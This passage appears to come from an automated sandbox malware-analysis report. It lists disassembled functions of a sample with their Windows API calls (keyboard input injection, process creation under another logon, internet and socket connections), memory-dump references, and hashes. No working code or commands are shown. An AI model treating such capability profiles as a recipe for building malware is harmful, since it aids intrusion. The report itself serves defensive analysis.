                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3321077145-0
                                                                                                                                                        • Opcode ID: 3cdbc881391d0b867667a54d7a1f9317e933d2aff320959f1da3891a465e8c24
                                                                                                                                                        • Instruction ID: 46c8c45cc2955287c9050597002ca139d9d3945ed9076ef46ebfb7f8d692fbbd
                                                                                                                                                        • Opcode Fuzzy Hash: 3cdbc881391d0b867667a54d7a1f9317e933d2aff320959f1da3891a465e8c24
                                                                                                                                                        • Instruction Fuzzy Hash: 1E411739600611DFCF11EF15C685A59BBE5EF89320B198499E846AF762CB34FD40CB91
                                                                                                                                                        Function 00AFB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AFB3E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                                        • Opcode ID: 9269085d8487e5ca975537202cf0bd36e4c77b5181c5d30934b350f487aba365
                                                                                                                                                        • Instruction ID: f57dbd6ccfc479fe6d048084e56f21f4eee67c919b4fba707cd757bbe91f5c01
                                                                                                                                                        • Opcode Fuzzy Hash: 9269085d8487e5ca975537202cf0bd36e4c77b5181c5d30934b350f487aba365
                                                                                                                                                        • Instruction Fuzzy Hash: 5831903466020CABEF249F98CE85BB87775AB05352F648612FB51DB5E2C730E9409B71
                                                                                                                                                        Function 00AFD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00AFD617
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFD68D
                                                                                                                                                        • PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00AFD70E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                        • Opcode ID: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                                                                                                                                                        • Instruction ID: 7e109cf059f56e222e21493904a3c5d33ee9bca520383e562849b767abdfa96b
                                                                                                                                                        • Opcode Fuzzy Hash: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                                                                                                                                                        • Instruction Fuzzy Hash: F4415A30A10218DFCB52DF98D884BA9BBF6BB45305F1481AAF609DF251D730E841CB50
                                                                                                                                                        Function 00AD4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00AD44EE
                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AD450A
                                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00AD456A
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00AD45C8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                        • Opcode ID: 1dbc3a2d0ae0c2398dbe26657bae726b14c2cbcfabb9f9f937d341f698699632
                                                                                                                                                        • Instruction ID: dcbb9ec5aa6981d8c5b64920495dc73b264e2d6fd44b8b294b4910edbc54191f
                                                                                                                                                        • Opcode Fuzzy Hash: 1dbc3a2d0ae0c2398dbe26657bae726b14c2cbcfabb9f9f937d341f698699632
                                                                                                                                                        • Instruction Fuzzy Hash: 9A31E2B1A04298AFEF208B64A9087FE7BB69B5D314F04025BF483933C1CB749E44D762
                                                                                                                                                        Function 00AC4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AC4DE8
                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00AC4E16
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E44
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E7A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                        • Opcode ID: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                                                                                                                                                        • Instruction ID: d4ceebad42b0ab1f6d5936799ddcedec978f8fb25dc862a43ec1371e8dbb258d
                                                                                                                                                        • Opcode Fuzzy Hash: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                                                                                                                                                        • Instruction Fuzzy Hash: 7631BE31600206AFDF229F74C855FEA7BAAFF49320F17852DE8218B1A1E730D850DB94
                                                                                                                                                        Function 00AF7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AF7AB6
                                                                                                                                                          • Part of subcall function 00AD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD69E3
                                                                                                                                                          • Part of subcall function 00AD69C9: GetCurrentThreadId.KERNEL32 ref: 00AD69EA
                                                                                                                                                          • Part of subcall function 00AD69C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00AD69F1
                                                                                                                                                        • GetCaretPos.USER32(?), ref: 00AF7AC7
                                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 00AF7B00
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AF7B06
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                                        • Opcode ID: 075dad0e6034e201b88a4085854f5c2544c1d1ec6d3853a95191dca83af3eaab
                                                                                                                                                        • Instruction ID: 5b918819135cd635898520ee85cca2bbd798cd533f96c5157b4b9d4b59e710d2
                                                                                                                                                        • Opcode Fuzzy Hash: 075dad0e6034e201b88a4085854f5c2544c1d1ec6d3853a95191dca83af3eaab
                                                                                                                                                        • Instruction Fuzzy Hash: F7311071D00108AFCB00EFB9D9859EFBBF9EF55310B11846AE415E7251DB359E058BA0
                                                                                                                                                        Function 00AE497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE49B7
                                                                                                                                                          • Part of subcall function 00AE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                                                                                                                                                          • Part of subcall function 00AE4A41: InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1463438336-0
                                                                                                                                                        • Opcode ID: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                                                                                                                                                        • Instruction ID: 19d6824dde8c9a8686f8dc90856dc32f7c37422a17e4aac602502dcf6238f90c
                                                                                                                                                        • Opcode Fuzzy Hash: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                                                                                                                                                        • Instruction Fuzzy Hash: 8C21A431640A45BFDB129F629C00FBBBBBDFB48711F14402AFA0597551EB71D811A794
                                                                                                                                                        Function 00ACBC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ACBCD9
                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00ACBCE0
                                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00ACBCFA
                                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ACBD29
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2621361867-0
                                                                                                                                                        • Opcode ID: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                                                                                                                                                        • Instruction ID: 5e2a2cba3ab374beb9f19054727aed479d006214aefc72cd74276710e1491a94
                                                                                                                                                        • Opcode Fuzzy Hash: 4e103f1a154861e40ce2581a0433789a7fc1cbe8f21ad78f8fba315a8aef17be
                                                                                                                                                        • Instruction Fuzzy Hash: 8D214F72115209BBDF029F98ED4AFDE7BA9EF08315F058019FA01A6160CB76DE61DB60
                                                                                                                                                        Function 00AF8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00AF88A3
                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88BD
                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88CB
                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AF88D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2169480361-0
                                                                                                                                                        • Opcode ID: f1c6c59f0ba910a89bc17413aceb1f8b00ea013b1f37e305cbb18e88b36bf672
                                                                                                                                                        • Instruction ID: fa9c12fb4ccfa4e3f6744cd8e67c3407b16f225f6580e2496927dd5a92aa4287
                                                                                                                                                        • Opcode Fuzzy Hash: f1c6c59f0ba910a89bc17413aceb1f8b00ea013b1f37e305cbb18e88b36bf672
                                                                                                                                                        • Instruction Fuzzy Hash: 06118E32305515AFDB14AB68CD05FBA7BE9EF853A0F548119F916C72E2CB78AD00CB94
                                                                                                                                                        Function 00AE900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00AE906D
                                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00AE907F
                                                                                                                                                        • accept.WS2_32(00000000,00000000,00000000), ref: 00AE908C
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE90A3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 385091864-0
                                                                                                                                                        • Opcode ID: 31ca8db01dbccc2203fae2724c9efec9f248a3f49426d7dab71045975fd51ac9
                                                                                                                                                        • Instruction ID: 2f11a629b02f5a6ce561cdf1016dcb283f13c6edf11789710a6fa50f723e64de
                                                                                                                                                        • Opcode Fuzzy Hash: 31ca8db01dbccc2203fae2724c9efec9f248a3f49426d7dab71045975fd51ac9
                                                                                                                                                        • Instruction Fuzzy Hash: 3C215475A001249FCB10DF69C985ADABBFCEF49710F40816AF849D7291DB749E41CB90
                                                                                                                                                        Function 00AD18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2CB9
                                                                                                                                                          • Part of subcall function 00AD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD2CDF
                                                                                                                                                          • Part of subcall function 00AD2CAA: lstrcmpiW.KERNEL32(00000000,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2D10
                                                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1916
                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD193C
                                                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1970
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                        • String ID: cdecl
                                                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                                                        • Opcode ID: 23f85e603ca50946ac197c1a26c373754901b24f020893e1bcbb7a2a507c910b
                                                                                                                                                        • Instruction ID: d90f88ccdb2eec68ced1e565229e91f3a3e114704b7caf384eda7d52697edfef
                                                                                                                                                        • Opcode Fuzzy Hash: 23f85e603ca50946ac197c1a26c373754901b24f020893e1bcbb7a2a507c910b
